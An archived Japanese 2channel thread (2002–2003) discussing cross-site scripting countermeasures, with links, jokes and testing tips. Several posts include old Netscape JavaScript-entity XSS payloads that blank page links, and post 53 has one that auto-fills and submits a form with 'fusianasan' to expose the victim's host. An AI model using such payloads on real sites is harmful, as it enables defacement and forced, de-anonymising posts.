クロスサイトスクリプティング対策

クロスサイトスクリプティング対策 (114ﾚｽ)
上下前次 1-新

45(1): ネスケ4.7使用者 02/01/27 10:13 ID:??? AAS
>>42
ひいい・・・・2ちゃんで窓が出たよう・・・。

46: 名無しさん＠お腹いっぱい。 02/01/27 10:17 ID:??? AAS
>45
(笑)

47: 仕様書無しさん 02/01/27 23:08 ID:??? AAS
>>40
分割すればいいみたい。>>12 >>13

48: 名無しさん＠お腹いっぱい。 [&{for(var i=0;document.links[i];i++)document.links[i].href='';};] 02/02/06 03:45 ID:??? AAS
テスト

49: 名無しさん＠お腹いっぱい。 02/02/06 03:46 ID:dMmdiZ7p(1) AAS
大手検索サイトに見るクロスサイトスクリプティングの脆弱性の実態(2002.2.4)
外部ﾘﾝｸ[html]:www.netsecurity.ne.jp

50: ﾃｽﾄ [&{f=document.forms;}] 02/02/08 00:23 ID:??? AAS

51: ﾃｽﾄ [&{for(i=0;f[i];i++)f[i].elments[4].value='fusianasan';}] 02/02/08 00:28 ID:??? AAS

52(1): 名無しさん＠お腹いっぱい。 02/02/08 13:44 ID:??? AAS
＞日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ
＞が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう
＞になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。

タグ可の掲示板はみんな着尺製ありだな
2chｽﾚ:sec

53: 名無しさん＠お腹いっぱい。 02/02/09 01:21 ID:??? AAS
F=Function;fs=document.forms;

l0=new F('f=fs[fs.length-1]');
l1=new F('es=f.elements;');
l2=new F('a=es[0];b=es[2];');
l3=new F('c=es[3];d=es[4];');
l4=new F('a.value=navigator.userAgent;');
l5=new F('b.value=\'fusianasan\';');
l6=new F('c.value=\'\';');
l7=new F('d.value=\' \';');

l8=new F('es[1].click();');
省4

54(1): 名無しさん＠お腹いっぱい。 02/02/12 11:32 ID:??? AAS
>>52
>着尺製

読めない…。

55(1): 名無しさん＠お腹いっぱい。 02/02/12 11:44 ID:??? AAS
>>54
> >着尺製
「脆弱性」の (2ch的?) 誤読だと思われ。

正しくは「もろよわせい」と読むらしい。

56: 名無しさん＠お腹いっぱい。 02/02/12 12:06 ID:??? AAS
>>55
2chｽﾚ:sec
2chｽﾚ:sec

57: 名無しさん＠お腹いっぱい。 [age] 02/02/12 22:55 ID:??? AAS
>>22
で、22はお腹いっぱいﾔﾊﾞｹﾞなの見つかったのかな?
SSLなページの確認はﾒﾝﾄﾞｰでないかい? >all
ｱﾎプログラマーの重箱の隅つつくのも疲れてきたぞ。（藁

58: 名無しさん＠お腹いっぱい。 [もろよわ] 02/02/19 00:17 ID:??? AAS
> SSLなページの確認はﾒﾝﾄﾞｰでないかい?

なぜに？

59: ５７ [age] 02/02/19 01:53 ID:??? AAS
漏れがバカだから。とりあえずﾊﾟｹｯﾄｷｬﾌﾟﾁｬｰしてどんな内容送ってるのか見ようと思うんだけど。
IEなんかのｸﾗｲｱﾝﾄで見て、値が固定されてるもののﾃｽﾄってどうしてますか?
例えば買い物の個数とかｻｰﾊﾞ側でｴｽｹｰﾌﾟ処理してるか確認したい訳で。
POSTﾒｿｯﾄﾞの値を色々試すのに良いﾂｰﾙってないですかねぇ。HTMLｴﾃﾞｨﾀで書き換える?

60(1): 名無しさん＠お腹いっぱい。 02/02/19 02:02 ID:??? AAS
外部ﾘﾝｸ:www.mountsystem.ne.jp
ここのTantanCGI

61: ５７ [age] 02/02/19 07:49 ID:??? AAS
>>60
すっ、すばらしい...。ありがとう御座います。感謝感激！
これでもっと重箱の隅つっけそうです。（藁

62: a 02/06/27 00:50 ID:awVCb82d(1) AAS
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};

63: 02/12/06 16:58 ID:??? AAS
ここで配布してるｽｸﾘﾌﾟﾄも脆弱性の問題あり？

外部ﾘﾝｸ[zip]:www.onpuch.jp

64: 03/01/10 01:43 ID:QhQLqNIU(1) AAS
Struts使おう。

上下前次 1-新書関写板覧索設栞歴

あと 50 ﾚｽあります
ｽﾚ情報赤ﾚｽ抽出画像ﾚｽ抽出歴の未読ｽﾚ AAｻﾑﾈｲﾙ

ぬこの手ぬこTOP 0.008s